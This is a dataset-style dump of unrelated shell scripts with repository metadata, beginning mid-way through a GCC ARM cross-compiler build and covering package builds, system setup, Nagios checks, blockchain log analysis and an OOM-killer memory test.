>"$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc
rm -rf "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build
mkdir "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build
cd "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build
../$GCC_SOURCES_DIR/configure \
CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
--target=$TARGET_PLATFORM \
--prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
--with-local-prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
--with-sysroot="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
--enable-languages=c,c++ \
--program-suffix=$PROGRAM_SUFFIX \
--enable-werror=no \
--enable-poison-system-directories \
--with-arch=armv7-a \
--with-float=hard \
--enable-__cxa_atexit \
--enable-libmudflap \
--enable-libgomp \
--enable-libssp \
--enable-libquadmath \
--enable-libquadmath-support \
--enable-libsanitizer \
--enable-threads=posix \
--enable-gold \
--disable-multilib \
--enable-c99 \
--enable-long-long \
--with-gmp="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-mpfr="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-mpc="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-isl="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-cloog="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
--with-libelf="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
2>&1 | tee configure-stdout.log
#--with-headers=$BUILDGCC_SYSTEM_HEADER_DIR <-- needed to copy includes in prefix/target/sys-include. Otherwise, configure failed saying preprocessor /lib/cpp can't run
if [[ -f config.status ]]; then
make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
[[ $? == 0 ]] && make install 2>&1 | tee make-install-stdout.log
# looks like arm-none-linux-gnueabi-g++ is missing. Don't know why.
[[ $? == 0 ]] && cp "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/g++-4.9.3 "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/arm-none-linux-gnueabi-g++
[[ $? == 0 ]] && touch make_sucessfully.done
fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build/make_sucessfully.done ]
then
echo *-*-*-*------------------------------------------------------------------ GCC cross 2 failed------------------------------------------------------------------------
exit 1
fi
if [[ -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build/make_sucessfully.done ]]; then
update_all_lib_path "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM || exit 1
update_all_lib_path -r "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM || exit 1
cd "$BUILDGCC_BUILD_DIR"
touch make_sucessfully.done
echo *-*-*-*------------------------------------------------------------------ Finished ------------------------------------------------------------------------
fi
| true
|
a8437334f2db4a8a1071685f4e35651d555d548e
|
Shell
|
kobigurk/mina-scripts
|
/find_holes.sh
|
UTF-8
| 588
| 3.28125
| 3
|
[] |
no_license
|
LIST=$(docker logs mina_mina-sidecar_1 2>&1 | grep "New tip" | awk '{print $4}' | tr -d '\.')
MIN=$(echo $LIST | jq -s min)
MAX=$(echo $LIST | jq -s max)
EXPECTED=$(seq $MIN $MAX)
echo $LIST | tr " " "\n" | uniq | sort -n > /tmp/mina-1
echo $EXPECTED | tr " " "\n" | uniq | sort -n > /tmp/mina-2
DIFF=$(diff --new-line-format="%L" --unchanged-line-format="" /tmp/mina-1 /tmp/mina-2)
RATIO="$(cat /tmp/mina-1 | wc -l)/$(cat /tmp/mina-2 | wc -l)"
echo "min, max, count different/total, percentage: $MIN, $MAX, $RATIO, $(echo "scale=2; 100*$RATIO" | bc -l)"
echo "differences:"
echo "$DIFF"
| true
|
2bede0a125ea7a869449de452029e98a3ce88b1f
|
Shell
|
fmidev/rack
|
/src/configure.sh
|
UTF-8
| 4,409
| 3.890625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Markus.Peura@fmi.fi
CONF_FILE='install-rack.cnf'
echo "Creating/updating Rack config file '$CONF_FILE'"
echo "(Optionally edited later.)"
if [ -f "$CONF_FILE" ]; then
cp -vi $CONF_FILE $CONF_FILE.bak
source $CONF_FILE
fi
echo
echo -n "# Conf by $USER, " > $CONF_FILE
date >> $CONF_FILE
echo >> $CONF_FILE
# Given a file (like 'geotiff.h'), returns its directory.
# Among several paths, selects the last one.
#
# ARGS: (include|lib) <variable-name> <file>
#
function guess_dir(){
local TYPE=$1 # include or lib
local KEY=$2
local FILE=$3
local P=''
local i
# Step 1: try standard
for i in /{usr,var}{,/local}/${TYPE}{,64,/${FILE%.*},/lib${FILE%.*},/x86_64-linux-gnu} ; do
echo "... $i/$FILE"
if [ -f $i/$FILE ]; then
P=$i/$FILE
break
fi
done
if [ "$P" != '' ]; then
echo "# $KEY: found standard path: $P"
else
local cmd="locate --regex '$FILE$'" # [1-9]?
echo "# $KEY: trying: $cmd"
eval $cmd
P=`locate --regex ${FILE}$ | fgrep -v /doc | tail -1`
fi
# Strip filename
P=${P%/*}
local P_old
eval P_old=\$$KEY
#if [ "$P" != "$P_old" ]; then
echo "# Previous value: $KEY=$P_old"
#echo $KEY="$P"
#fi
eval $KEY="$P"
echo
}
# Utility to change default variables (above)
# ARGS: <variable-name> <prompt-text>
function ask_variable(){
local key=$1
local X
eval X="\$$key"
shift
echo $*
read -e -i "$X" -p " $key=" $key
eval X=\$$key
echo "# $*" >> $CONF_FILE
echo "$key='$X'" >> $CONF_FILE
echo >> $CONF_FILE
echo
}
function warn_if_unfound(){
if [ ! -d "$1" ]; then
echo "Warning: $1 not found"
fi
}
function unset_if_unfound(){
if [ ! -d "$1" ]; then
echo "Warning: $1 not found"
unset $1
fi
}
# Todo recode
echo 'Automagically detecting CCFLAGS and LDFLAGS'
#guess_include_dir HDF5_INCLUDE hdf5.h
#guess_include_dir HDF5_LIB libhdf5.a
#guess_include_dir PROJ_INCLUDE proj_api.h
#guess_include_dir GEOTIFF_INCLUDE geotiff.h
prefix=${prefix:-'/var/opt'} # or '.'?
echo
#echo "Accept or modify the directories detected above:"
#echo
#ask_variable HDF5_INCLUDE "Hierarchical Data Format (HDF5), include directory"
#warn_if_unfound $HDFROOT
#ask_variable PROJ_INCLUDE "PROJ.4 projection library, include directory"
#warn_if_unfound $PROJ_INCLUDE
#ask_variable GEOTIFF_INCLUDE "GeoTIFF include directory (leave empty if GeoTIFF not used)"
echo "# Checking if 'pkg-config' utility is available"
PKGC=''
if pkg-config --version > /dev/null ; then
echo -e "# Calling 'pkg-config' for setting CCFLAGS and LDFLAGS"
# pkg-config warnings here can be discarded
PKGC="pkg-config --silence-errors"
fi
CCFLAGS='-std=gnu++11 -fopenmp' # ${GEOTIFF_INCLUDE:+"-I$GEOTIFF_INCLUDE"}
LDFLAGS='-std=gnu++11 -fopenmp'
#for i in hdf5 proj png ${GEOTIFF_INCLUDE:+'tiff'} ${GEOTIFF_INCLUDE:+'geotiff'}; do
#for i in hdf5 proj_api png tiff geotiff; do
for i in hdf5 proj png tiff geotiff; do
if [ "$PKGC" != '' ]; then
# Attempt #1 ...
CCFLAGS="$CCFLAGS `$PKGC --cflags $i`" && LDFLAGS="$LDFLAGS `$PKGC --libs $i`" && continue
# Attempt #2 ...
CCFLAGS="$CCFLAGS `$PKGC --cflags lib$i`" && LDFLAGS="$LDFLAGS `$PKGC --libs lib$i`" && continue
echo -e "# $i:\t Not found with 'pkg-config' "
fi
key=${i^^}_INCLUDE
guess_dir 'include' ${key} $i.h
ask_variable ${key} "Include dir for $i"
eval value=\$${key}
if [ ! -e "$value" ]; then
echo -e "# $i:\t warning: not found"
continue
fi
#VALUE=${value:+"-I$value"}
CCFLAGS="$CCFLAGS -I$value"
i=${i%_*} # proj_api => proj
key=${i^^}_LIB
guess_dir lib ${key} lib$i.so
ask_variable ${key} "Library dir for $i"
eval value=\$${key}
if [ -e "$value" ]; then
LDFLAGS="$LDFLAGS -L$value -l$i"
#LDLIBS="$LDLIBS -l$i"
else
echo -e "# $i:\t warning: not found"
fi
done
echo "Final values: "
ask_variable CCFLAGS "Include paths"
ask_variable LDFLAGS "Library paths"
#ask_variable LDLIBS "Libraries"
ask_variable prefix 'Directory prefix for binary executable: ${prefix}/bin/'
warn_if_unfound $prefix
echo "# GeoTiff support (optional)" >> $CONF_FILE
USE_GEOTIFF='NO'
USE_GEOTIFF=${GEOTIFF_LIB:+"YES"}
echo "USE_GEOTIFF=${USE_GEOTIFF}" >> $CONF_FILE
echo
echo "Created $CONF_FILE with contents:"
echo
cat $CONF_FILE
echo "Updated '$CONF_FILE'"
echo
echo "Continue with ./build.sh"
| true
|
6d7b7fbdd5526ac131815ea4006c55d0831d7c70
|
Shell
|
migueldvb/arch4edu
|
/rocm-comgr/PKGBUILD
|
UTF-8
| 1,345
| 2.859375
| 3
|
[] |
no_license
|
# Maintainer: Ranieri Althoff <ranisalt+aur at gmail dot com>
pkgname=rocm-comgr
pkgdesc='Radeon Open Compute - compiler support'
pkgver=3.3.0
pkgrel=1
arch=('x86_64')
url='https://github.com/RadeonOpenCompute/ROCm-CompilerSupport'
license=('custom')
makedepends=(cmake git llvm-roc)
source=(
"rocm-comgr::git+https://github.com/RadeonOpenCompute/ROCm-CompilerSupport#tag=rocm-$pkgver"
# "rocm-comgr-2.6.0-find-clang.patch"
# "rocm-comgr-2.6.0-find-lld-includes.patch"
# "rocm-comgr-2.8.0-dependencies.patch"
)
sha256sums=('SKIP')
# 'f04ff936e87a888264e9c0920c9356a85b18e9ec9d729fcf53f83755c171828c'
# '4571b16961f15249e8cc8b9a9ae7f0863600345aa5e95959192149eacdb01d2e')
prepare() {
cd "$srcdir/rocm-comgr/lib/comgr"
local src
for src in "${source[@]}"; do
src="${src%%::*}"
src="${src##*/}"
[[ $src = *.patch ]] || continue
msg2 "Applying patch $src..."
patch -Np1 -i "$srcdir/$src"
done
}
build() {
if check_buildoption "ccache" "y"; then
CMAKE_FLAGS="-DROCM_CCACHE_BUILD=ON"
fi
cmake $CMAKE_FLAGS \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=/opt/rocm \
-DClang_DIR=/opt/rocm/lib/cmake/clang \
"$srcdir/rocm-comgr/lib/comgr"
make
}
package() {
DESTDIR="$pkgdir/" make -C "$srcdir" install
}
| true
|
046855a2e14122866bd48db587827bcccb32d154
|
Shell
|
wesleip/custom
|
/customworkstation.sh
|
UTF-8
| 1,781
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
## Removendo travas eventuiais do apt ##
sudo apt-get clean ; sudo rm /var/lib/dpkg/lock-frontend ; sudo rm /var/cache/apt/archives/lock;
## Update dos repositórios ##
sudo apt update -y &&
## Instalação de pacotes e repositórios ##
sudo apt install filezilla git snapd &&
## Instalação de pacotes Snap ##
sudo snap install --classic code &&
## Instalação de Pacotes Externos ##
#--- Brave ---#
sudo apt install apt-transport-https curl &&
sudo curl -fsSLo /usr/share/keyrings/brave-browser-archive-keyring.gpg https://brave-browser-apt-release.s3.brave.com/brave-browser-archive-keyring.gpg &&
echo "deb [signed-by=/usr/share/keyrings/brave-browser-archive-keyring.gpg arch=amd64] https://brave-browser-apt-release.s3.brave.com/ stable main"|sudo tee /etc/apt/sources.list.d/brave-browser-release.list &&
sudo apt update &&
sudo apt install brave-browser ;
#--- Notion ---#
wget https://notion.davidbailey.codes/notion-linux.list ;
sudo mv notion-linux.list /etc/apt/sources.list.d/notion-linux.list;
sudo apt update && sudo apt install notion-desktop;
#--- Qbittorrent --#
sudo add-apt-repository ppa:qbittorrent-team/qbittorrent-stable ;
sudo apt-get update ;
sudo apt-get install qbittorrent ;
#--- Zoom ---#
wget https://zoom.us/client/latest/zoom_amd64.deb -O zoom.deb ;
sudo apt install ./zoom.deb ;
#--- BalenaEtcher ---#
echo "deb https://dl.bintray.com/resin-io/debian stable etcher" | sudo tee /etc/apt/sources.list.d/etcher.list ;
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 379CE192D401AB61 ;
sudo apt-get update ;
sudo apt-get install etcher-electron ;
## Atualização do Sistema ##
sudo apt update && sudo apt dist-upgrade -y && sudo apt autoclean -y && sudo apt autoremove -y &&
## Fim ##
echo "Finalizado"
| true
|
94e8155cebbb222842c526e323904efe293cd8ec
|
Shell
|
brisbane/nrpe
|
/templates/passive_check_yumupdate.erb
|
UTF-8
| 2,056
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
PROGNAME=`basename $0`
nagiosbox=<%= nagios_server %>
send_nsca_config=/etc/nagios/send_nsca.cfg
print_usage() {
echo "Usage: $PROGNAME"
}
print_help() {
echo -e "This plugin checks whether there are outstanding package updates with yum.\n"
exit 0
}
case "$1" in
--help)
print_help
exit 0
;;
-h)
print_help
exit 0
;;
*)
# Run yum, all from cache, minimal errors, minimal debug output
list=$(yum -e0 -d0 check-update)
status=$(echo "${list}" | wc -l)
if test ${status} -eq 1; then
echo -e ${HOSTNAME}"\tYUM updates\t0\tYUM OK - no outstanding updates\n" | /usr/sbin/send_nsca -H ${nagiosbox} -c ${send_nsca_config}
exit 0
elif test ${status} -lt 30; then
# Check number of updates required for individual repos
shortlist=$(echo "${list}" | awk 'NR>1 {repo[$3]++} ; END {for (n in repo) {print n, repo[n]}}')
echo -e -n ${HOSTNAME}"\tYUM updates\t1\tWARNING - pending updates: "${shortlist}"\n" | /usr/sbin/send_nsca -H ${nagiosbox} -c ${send_nsca_config}
exit 1
elif test ${status} -gt 30; then
# Check number of updates required for individual repos
shortlist=$(echo "${list}" | awk 'NR>1 {repo[$3]++} ; END {for (n in repo) {print n, repo[n]}}')
echo -e -n ${HOSTNAME}"\tYUM updates\t1\tCRITICAL - pending updates: "${shortlist}"\n" | /usr/sbin/send_nsca -H ${nagiosbox} -c ${send_nsca_config}
exit 2
else
echo "UNKNOWN - error getting yum status"
exit 3
fi
;;
esac
| true
|
01c244ca40aed8cea97d7f279602fc4d5ec30144
|
Shell
|
hngr18/translate
|
/scripts/translateFrom.sh
|
UTF-8
| 504
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
[[ $1 = '' ]] && term="Здраво" || term=$1
[[ $2 = '' ]] && from="serbian" || from=$2
[[ $3 = '' ]] && to="english" || to=$3
user_agent='Mozilla/5.0 (Linux; Linux 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019; en-US)'
encQuery=$(echo -e $term+$from+to+$to | od -An -tx1 | tr ' ' % | xargs printf "%s")
translateResponse=$(curl -H "User-Agent: $user_agent" -s https://www.bing.com/search\?q=$encQuery)
echo $translateResponse | grep -oP '(?<=<span id="tta_tgt">)[^<]+'
| true
|
f003b6c9767a27e464fa7e22da72c550b3c7ee50
|
Shell
|
gabmartinez/theater-backend
|
/.docker/deploy.sh
|
UTF-8
| 354
| 2.8125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Building the container using Dockerfile configuration
docker build --file=.docker/Dockerfile -t theater-service .
# Stoping if exist a container started
docker stop theater-service || true
# Launching a latest container created
docker run --rm --env-file=.docker/.env -d --name theater-service -p 5001:8080 theater-service:latest
| true
|
8a168312141dc46c26ee5bfa8c03fa26affb4aab
|
Shell
|
Interana/examples
|
/oomkiller/memoryeater_t7_cgroups_m3xlarge.sh
|
UTF-8
| 282
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
MY_PID=$$
echo Adding my pid to cgroup : $MY_PID
echo $MY_PID | sudo tee /sys/fs/cgroup/memory/interana/cgroup.procs
for i in $(seq 1 100); do for j in $(seq 1 2); do (./memoryeater_and_kill 10 300 20 50 > memoryeater_and_kill.$i$j.log 2>&1 &) ; done ; sleep 30; done
| true
|
381d3232656c798d5b0a56d9327173fdfc47b9ed
|
Shell
|
bor-attila/fatbox
|
/scripts/26-sphinxsearch.sh
|
UTF-8
| 583
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
echo "Installing sphinxsearch ..."
wget http://sphinxsearch.com/files/sphinx-3.3.1-b72d67b-linux-amd64.tar.gz -O sphinx.tar.gz
tar -xf sphinx.tar.gz
rm sphinx.tar.gz
mv sphinx-3.3.1 ~/sphinx
## Set SQL server driver name
sudo sh -c 'echo "[SQL Server]" > /tmp/odbc'
sudo sh -c "tail -n 4 /etc/odbcinst.ini >> /tmp/odbc"
sudo sh -c "cat /tmp/odbc >> /etc/odbcinst.ini"
sudo rm -f /tmp/odbc
#add mssql-tools to vagrant user
echo 'export PATH="$PATH:/opt/mssql-tools/bin"' >> ~/.bash_profile
echo 'export PATH="$PATH:/opt/mssql-tools/bin"' >> ~/.bashrc
#source ~/.bashrc
| true
|
f423177566ca1e7029ccf7b9c12b3c7cf26a6d5c
|
Shell
|
b-berry/lg-scripts
|
/start-desktop.sh
|
UTF-8
| 1,789
| 3.640625
| 4
|
[] |
no_license
|
# TMUX Start Desktop Session
TMUX_NAME="desktop"
XTEST=$(DISPLAY=:0 xrandr | grep -c " connected")
echo "Running xrandr test: $XTEST"
case $XTEST in
1)
echo "...Found single display, setting up default workspace."
xrandr --output eDP1 --mode 1920x1080 --pos 0x0 --rotate normal --output HDMI1 --off --output DP1 --off --output VIRTUAL1 --off
;;
2)
echo "...Found multiple displays connected, setting up default dual workspace."
xrandr --output eDP1 --mode 1920x1080 --pos 0x0 --rotate normal --output HDMI1 --mode 1680x1050 --pos 1920x0 --rotate normal --output DP1 --off --output VIRTUAL1 --off
;;
*)
echo "FAIL: xrandr test. Abording!" && exit 1
;;
esac
# Test for exisitng active session
tmux has-session -t $TMUX_NAME 2>/dev/null
if [ "$?" -eq 1 ]; then
echo "Building tmux: ${TMUX_NAME}"
for i in {1..5}; do
case $i in
1) tmux -q new-sess -d -s $TMUX_NAME &&\
tmux new-window -t "${TMUX_NAME}:${i}"
;;
3) cd $HOME/src
echo "...Creating window: SRC"
tmux new-window -t "${TMUX_NAME}:${i}" -n "SRC"
;;
4) cd $HOME/src/lg_chef
echo "...Creating window: CHEF"
tmux new-window -t "${TMUX_NAME}:${i}" -n "CHEF"
;;
5) cd $HOME/src/lg_chef
echo "...Creating window: ${i}"
tmux new-window -t "${TMUX_NAME}:${i}"
;;
*) cd $HOME
echo "...Creating window: ${i}"
tmux new-window -t "${TMUX_NAME}:${i}"
;;
esac
done
else
echo "Existing tmux session found: ${TMUX_NAME}"
fi
# Join tmux
echo "Attaching to tmux: ${TMUX_NAME}"
xfce4-terminal --geometry 225x54+42+52 --command="tmux att -t ${TMUX_NAME}" #-c tmux select-window -t 1"
| true
|
b63810112e18db09f3e44976e9221ef4994d96bc
|
Shell
|
kijisky/zabbix_templates
|
/snmp-macaddress-table/snmp_macaddr_name.sh
|
UTF-8
| 737
| 3.375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
snmp_ipaddress=$1
snmp_comunity=$2
macaddress=$3
bridge_port=`snmpget -Ov -v1 -c $snmp_comunity $snmp_ipaddress 1.3.6.1.2.1.17.4.3.1.2.$macaddress 2>/dev/null`
if [ "$bridge_port" = "" ]; then
echo Mac Address $macaddress not found;
exit;
fi;
bridge_port=`echo $bridge_port | cut -d':' -f 2 | sed 's/^ //g'`
#echo $bridge_port
if_port=`snmpget -Ov -v1 -c $snmp_comunity $snmp_ipaddress .1.3.6.1.2.1.17.1.4.1.2.$bridge_port | cut -d' ' -f 2`
#echo $if_port
if_name=`snmpget -Ov -v1 -c $snmp_comunity $snmp_ipaddress .1.3.6.1.2.1.2.2.1.2.$if_port | cut -d '"' -f 2`
echo $if_name
if_descr=`snmpget -Ov -v1 -c $snmp_comunity $snmp_ipaddress 1.3.6.1.2.1.31.1.1.1.18.$if_port 2>/dev/null | cut -d":" -f 2`
echo $if_descr
| true
|
dd4956c545ca283a929fd7e1558137a371899b3a
|
Shell
|
lorenzofailla/Domotic-Linux-Deploy
|
/scripts/domotic-gettcpreply
|
UTF-8
| 1,110
| 3.875
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
SCRIPT_NAME="domotic-sendtcpmsg"
CONFIG_FILE_PATH="/etc/domotic/domotic.conf"
ERRCODE___WRONG_NUMBER_OF_PARAMETERS=1
ERRCODE___NO_CONFIG_FILE=2
# verifica che il numero di argomenti passati in argomento sia corretto
# altrimenti stampa un messaggio di errore ed esce
if [ $# != 2 ]; then
# il numero di argomenti non è corretto.
# stampa un messaggio di errore ed esce
echo "Wrong number of parameters passed. Expected: 2, Actual: $#
Usage: $SCRIPT_NAME command-header command-body"
exit $ERRCODE___WRONG_NUMBER_OF_PARAMETERS
fi
# il numero di argomenti è corretto.
# verifica che esista il file di configurazione.
# se non esiste, stampa un messaggio di errore ed esce
if [ ! -f "$CONFIG_FILE_PATH" ]; then
# il file di configurazione non esiste
# stampa un messaggio di errore ed esce
echo "Configuration file $CONFIG_FILE_PATH cannot be found."
exit $ERRCODE___NO_CONFIG_FILE
fi
# il file di configurazione esiste
# TODO: recupera il numero della porta
PORT=9099
REPLY=$(
nc localhost 9099 << EOF
@MODE-EXITATCOMMAND
@COMMAND?header=$1&body=$2
EOF
)
echo -n "$REPLY"
| true
|
ba476fa23e6fcc06aeb95fa25d5b91d43fd40d96
|
Shell
|
alreece45/docker-images
|
/ssh-keygen/ubuntu_trusty/opt/init
|
UTF-8
| 1,360
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/bash
entropy_avail=`cat /proc/sys/kernel/random/entropy_avail`
if [ $entropy_avail -lt 256 ]
then
echo "Warning: Low amount of entropy available: $entropy_avail"
fi
validates=1
if [ -z "$KEYS_FILE" ]
then
echo 'Error: $KEYS_FILE (authorized_keys file) undefined'
validates=0
fi
if [ -z "$KEY_FILE" ]
then
echo 'Error: $KEY_FILE (private key file) undefined'
fi
if [ $validates -eq 0 ]
then
exit 255
fi
if [ ! -f "$KEY_FILE" ]
then
ikeygen_opts=()
keygen_opts+=(-q)
keygen_opts+=(-f "$KEY_FILE")
if [ -n "$PASSPHRASE" ]
then
keygen_opts+=(-N "$PASSPHRASE")
else
PASSPHRASE=''
keygen_opts+=(-N '')
fi
if [ -n "$KEY_TYPE" ]
then
keygen_opts+=(-t "$KEY_TYPE")
fi
if [ -n "$KEY_BITS" ]
then
keygen_opts+=(-b "$BITS")
fi
if [ -n "$KEY_COMMENT" ]
then
keygen_opts+=(-C $KEY_COMMENT)
fi
if [ -n "$KEYGEN_OPTS" ]
then
keygen_opts="$keygen_opts $KEYGEN_OPTS"
fi
ssh-keygen "${keygen_opts[@]}"
echo Generated Key: `ssh-keygen -l -f $KEY_FILE`
if [ -n "$KEY_USER" ]
then
chown $KEY_USER $KEY_FILE $KEY_FILE.pub
fi
if [ -n "$KEY_GROUP" ]
then
chown $KEY_GROUP $KEY_FILE $KEY_FILE.pub
fi
fi
echo $KEY_OPTIONS `ssh-keygen -y -f $KEY_FILE` $KEY_COMMENT >> $KEYS_FILE
| true
|
6a750a771e7d1748085a189eb3564254dab04fca
|
Shell
|
anwyn/systemd.user
|
/user-environment-generators/jack-environment-generator
|
UTF-8
| 953
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/sh
doexport=
if [ "$1" = "--export" ]
then
doexport=true
shift
fi
for parm in rate nperiods period device; do
name=JACK_$(echo $parm | /usr/bin/tr 'a-z' 'A-Z')
# using jack_control will startup jack via dbus, we want to avoid this early in the startup sequence
# value=$(/usr/bin/jack_control dp | /bin/grep -e "^\ *${parm}:" | /bin/sed 's/.*:\(.*\))$/\1/')
# so we are picking the values directly from ~/.config/jack/conf.xml
value=$(/bin/grep "<option name=\"$parm\">" ~/.config/jack/conf.xml |
/bin/sed "s,^ *<option name=\"$parm\">\([^<]*\)</option>.*$,\1,")
if [ -n "$value" ]
then
test "$parm" = "device" && value=$(echo $value | /bin/sed 's/\([0-9][0-9]*\)/hw:\1/')
if [ "$doexport" = "true" ]
then
/bin/systemctl --user set-environment $name="$value" >/dev/null 2>&1
else
echo $name="$value"
fi
fi
done
| true
|
0f272d82e935ee8d540f4b04e9dfcd38271c4b62
|
Shell
|
lapy/Hassio-Addons
|
/.scripts/release.sh
|
UTF-8
| 1,771
| 3.953125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
set -e
archs="${ARCHS}"
for addon in "$@"; do
if [[ "$(jq -r '.image' ${addon}/config.json)" == 'null' ]]; then
echo "No build image set for ${addon}. Skip release!"
exit 0
fi
if [ -z "$archs" ]; then
archs=$(jq -r '.arch // ["armv7", "armhf", "amd64", "aarch64", "i386"] | [.[] | .] | join(" ")' "${addon}/config.json")
fi
image_template=$(jq -r '.image' "${addon}/config.json")
plugin_version=$(jq -r '.version' "${addon}/config.json")
# Check the existance of all images
sum=0
missing=0
for arch in ${archs}; do
image_name=${image_template/\{arch\}/$arch}
sum=$((sum + 1))
if [[ "$(docker images -q "$image_name:$plugin_version" 2> /dev/null)" == "" ]]; then
echo -e "${ANSI_RED}No local image for $image_name found.${ANSI_CLEAR}"
missing=$((missing + 1))
else
echo -e "${ANSI_GREEN}Local image $image_name found.${ANSI_CLEAR}"
fi
done
if [ "$missing" -eq "$sum" ]; then
echo 'Images for all architectures missing. Assuming no build and skip.'
exit 0
elif [ "$missing" -gt "0" ]; then
echo -e "${ANSI_RED}There are $missing architecture images missing. Release failed!${ANSI_CLEAR}"
exit 1
fi
if [[ "$FORCE_PUSH" = "true" ]] || { [[ "$TRAVIS_BRANCH" = 'master' ]] && [ -z ${TRAVIS_PULL_REQUEST_BRANCH} ]; }; then
# Push them
echo "$DOCKER_PASS" | docker login -u "$DOCKER_USER" --password-stdin
for arch in ${archs}; do
image_name=${image_template/\{arch\}/$arch}
echo "Push $image_name..."
docker push "$image_name:$plugin_version"
docker push "$image_name:latest"
echo "Pushed $image_name"
done
else
echo 'Not master, skip docker push.'
fi
echo "Finished deployment of ${addon}"
done
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.